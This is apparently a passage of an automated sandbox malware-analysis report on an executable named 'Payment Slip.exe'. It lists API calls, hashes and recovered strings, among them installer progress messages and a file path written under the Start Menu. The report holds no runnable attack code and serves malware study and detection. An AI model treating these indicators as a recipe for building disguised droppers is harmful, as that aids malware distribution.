                                              • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                              • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                              • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                              • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                              • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Payment Slip.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-813433353
                                              • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                              • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                              • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                              • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                              • GetSysColor.USER32(00000000), ref: 004041CD
                                              • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                              • SetBkMode.GDI32(?,?), ref: 004041E5
                                              • GetSysColor.USER32(?), ref: 004041F8
                                              • SetBkColor.GDI32(?,?), ref: 00404208
                                              • DeleteObject.GDI32(?), ref: 00404222
                                              • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                              • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                              • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                              APIs
                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                                • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                              • String ID: 9
                                              • API String ID: 1149667376-2366072709
                                              • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                              • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                              • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                              • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                              • GlobalFree.KERNEL32(00000000), ref: 00402875
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                              • String ID:
                                              • API String ID: 3294113728-0
                                              • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                              • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                              • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                              • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                              • String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                              • API String ID: 1453599865-3010710425
                                              • Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                              • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                              • Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                              • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                              • GetTickCount.KERNEL32 ref: 00402D51
                                              • wsprintfW.USER32 ref: 00402D7F
                                                • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                              • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                • Part of subcall function 00402CFC: MulDiv.KERNEL32(0001E7BF,00000064,0002368D), ref: 00402D11
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                              • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                              • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                              • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                              • GetMessagePos.USER32 ref: 00404A7F
                                              • ScreenToClient.USER32(?,?), ref: 00404A99
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                              • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                              • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                              • wsprintfW.USER32 ref: 00402CCF
                                              • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                              • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                              • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                              • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                              • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                              • Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                              • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                              APIs
                                              • GetDC.USER32(?), ref: 00401D44
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                              • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                              • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                              • Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                              • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                              APIs
